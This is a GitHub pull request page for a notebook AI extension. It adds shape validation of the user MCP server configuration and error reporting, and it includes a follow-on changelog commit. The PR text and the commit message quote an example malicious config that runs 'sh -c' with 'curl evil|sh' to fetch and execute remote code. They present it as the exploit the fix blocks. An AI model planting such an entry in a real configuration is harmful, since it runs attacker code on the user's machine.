Skip to content

security(mcp): validate user MCP config shape before persisting#299

Merged
mbektas merged 1 commit into
plmbr:mainfrom
pjdoland:fix/validate-mcp-config-json
May 18, 2026
Merged

security(mcp): validate user MCP config shape before persisting#299
mbektas merged 1 commit into
plmbr:mainfrom
pjdoland:fix/validate-mcp-config-json

Conversation

@pjdoland
Copy link
Copy Markdown
Collaborator

Summary

MCPConfigFileHandler.post accepted any JSON body, assigned it verbatim to user_mcp, persisted to disk, and called update_mcp_servers. There was no shape validation, so:

  • {mcpServers: null} crashed the loader on the next reload with AttributeError.
  • {mcpServers: {evil: {command: 'sh', args: ['-c', 'curl evil|sh']}}} installed a destructive stdio server that fired on the next session start.

The previous failure path silently returned HTTP 200 with the exception message in the body, so the client had no way to tell the save had failed.

Solution

New module notebook_intelligence/mcp_config_validation.py exports validate_mcp_config(data) (raises MCPConfigValidationError). The handler now returns:

  • HTTP 400 with the validator's message on bad shape.
  • HTTP 400 with the parser error on invalid JSON.
  • HTTP 500 with the exception on downstream save / reconcile failure.

ai_service_manager.nbi_config.user_mcp is mutated only after the validator passes; the disk write and update_mcp_servers never run on rejected payloads.

Validator coverage:

  • Top-level keys constrained to mcpServers and participants.
  • Each mcpServers[name] entry must be an object with exactly one of command or url, unless disabled: true (which lets a user park an entry by stripping the command, matching the loader's skip-on-disabled behavior).
  • command and url must be non-empty strings (the empty-url check restores symmetry with the existing empty-command rule).
  • args and autoApprove must be lists of strings; env and headers must be string-to-string maps; disabled must be a bool; type must be one of {stdio, sse, http} AND consistent with the command/url presence. A type='stdio' with a url, or a type='http' with a command, is now rejected loudly instead of being silently dropped by the loader.
  • Unknown per-server keys are rejected so a typo like commnd does not silently leave the entry inert.

Frontend: NBIMCPConfigDocument._onSave in src/index.ts now catches the rejection and surfaces it via Notification.error. Without this, the document model went clean on save and the user had no signal that their edit did not persist.

Testing

  • tests/test_mcp_config_validation.py: 38 unit cases on the validator (empty/degenerate, top-level keys, server-entry rules including the disabled-parking allowance, motivating exploit shapes), and four dispatch-level cases driving the real MCPConfigFileHandler via AsyncHTTPTestCase (rejected payload returns 400, no side effects; valid payload returns 200 and writes through to a mocked ai_service_manager).
  • Full suites: pytest 802 pass, tsc clean, prettier clean, jest 178 pass.

Risks / follow-ups

  • Behavior change: existing ~/.jupyter/nbi/mcp.json files on disk are unaffected because the validator runs only on POST. If an existing file already contains a shape the validator now rejects (mcpServers: null, unknown keys), the user will see the rejection the first time they edit and save through the Settings UI. The loader is unchanged, so existing files that load today continue to load.
  • Validate-on-read not addressed: a mcpServers: null written before this PR still crashes the loader at session start. A future PR could lift the validator into the read path with per-entry try/except and drop-with-warning semantics.
  • XSRF is a separate concern: this handler is still @tornado.web.authenticated without an _xsrf check. The validator is defense in depth; the cross-site forgery surface is tracked as a separate audit item.
  • Read-after-write integration: the validator is consistent with the MCPManager.create_mcp_server loader contract verified by code-cross-reference, but there is no end-to-end POST→GET round-trip test. The handler-mock test pins that nbi_config.save is called with the validated payload; an integration round-trip would belong in a separate AsyncHTTPTestCase that wires the full stack.

MCPConfigFileHandler.post took the request body, assigned it verbatim
to user_mcp, saved to disk, and called update_mcp_servers. There was no
schema validation: 'mcpServers: null' crashed the loader on next reload,
and an adversarial '{mcpServers: {evil: {command: "sh", args: ["-c",
"curl evil|sh"]}}}' installed a destructive server. The previous
exception path silently returned 200 with the message in the body so
the client could not even tell the save had been rejected.

Add notebook_intelligence/mcp_config_validation.py exporting
validate_mcp_config and MCPConfigValidationError. The handler now
returns 400 with the validator's message on both invalid JSON and bad
shape, 500 on downstream save / reconcile failure, and writes through
to disk only after validation passes. The validator covers:

- Top-level keys constrained to mcpServers and participants.
- mcpServers entries must be objects, with exactly one of command or
  url unless 'disabled' is true (parking a server with no command is
  allowed since the loader skips disabled entries before reading either
  field).
- command / url must be non-empty strings. The explicit empty-url check
  matches the existing empty-command rule for symmetry.
- args, autoApprove must be lists of strings; env, headers must be
  string-to-string maps; disabled must be bool; type must be one of
  {stdio, sse, http} AND consistent with the command/url presence
  (type='stdio' with a url, or type='http' with a command, are now
  rejected loudly instead of silently dropped by the loader).
- Unknown server-entry keys are rejected so a typo like 'commnd' isn't
  silently ignored.

Frontend: NBIMCPConfigDocument._onSave now catches the rejection and
surfaces it via Notification.error. Without this, the document model
went clean on save and the user had no signal that their edit didn't
actually persist.
@pjdoland pjdoland added the bug Something isn't working label May 18, 2026
@pjdoland pjdoland changed the title fix(mcp): validate user MCP config shape before persisting security(mcp): validate user MCP config shape before persisting May 18, 2026
@mbektas mbektas merged commit 2ff7f00 into plmbr:main May 18, 2026
5 of 6 checks passed
pjdoland added a commit to pjdoland/notebook-intelligence that referenced this pull request May 22, 2026
Promotes the [Unreleased] CHANGELOG snapshot to [5.0.0] - 2026-05-22
and expands it to cover everything merged into upstream/main after
PR plmbr#287's docs refresh. Bumps package.json to 5.0.0.

CHANGELOG additions cover the post-plmbr#287 surface:

- Settings tabs: plugin marketplace picker (plmbr#284), plugin marketplace
  details + Update button (plmbr#303), per-workspace MCP disable (plmbr#286),
  JSON-paste path in Add MCP server (plmbr#285).
- Launchers: hide-with-policy (plmbr#288), brand icons for Codex / opencode
  (plmbr#325, plmbr#333), per-launch directory picker (plmbr#332).
- Chat sidebar and agentic UX: workspace @-mention in Claude mode
  (plmbr#327), reload-open-files-on-disk (plmbr#330), steered system prompt
  away from over-eager notebook creation (plmbr#336).
- Skills: multi-manifest support (plmbr#321), tracks-upstream for user-
  imported skills (plmbr#322), HTTP kill switch for the reconciler (plmbr#291).
- Accessibility: full sub-section covering plmbr#305-plmbr#320.
- Security: shell-tool sandbox (plmbr#290), Claude UI-bridge sandbox (plmbr#323),
  0o600 on encrypted token (plmbr#293), env-secret scrubbing (plmbr#295), MCP
  config shape validation (plmbr#299), XSS allowlist (plmbr#296), Copilot WS
  auth + origin (plmbr#301), GHE host detection (plmbr#292), fastmcp -> mcp SDK
  swap (plmbr#324).
- Fixed: session listing unification (plmbr#310), session preview unwrap
  (plmbr#331), down-area runtime throw (plmbr#330 follow-up), WS message-handler
  leak (plmbr#294).
- Removed: fastmcp dependency, history.jsonl session gate.

Adds a Migration note covering the five behavior changes operators
should review before upgrading from 4.x: fastmcp swap, path
sandboxes, history.jsonl gate removal, workspace @-mention pointer
shape, and the Copilot WebSocket auth/origin tightening.

Two reviewer rounds (six personas each) applied:
- Round 1 caught security overclaims (plmbr#293, plmbr#299, plmbr#323), the
  plmbr#284/plmbr#303 mis-attribution, missing migration note, 3 em dashes,
  and the stale `fastmcp==2.x.*` recommendation in the admin guide.
- Round 2 caught the missing plmbr#301 migration bullet, missing version-
  matrix 5.0.x row, missing README TOC entry, and a couple of style
  nits (sub-heading overpromise, orphan bullet).

Skipped (deferred to future PRs):
- README first-run tour mention.
- Admin guide HTTP kill-switch row in Failure-modes table.
- Terminal drag-drop trust-model precision update after plmbr#327.
- Cipher description nit in plmbr#293 (Fernet AES-128-CBC+HMAC, not
  AES-GCM).
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

bug Something isn't working

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants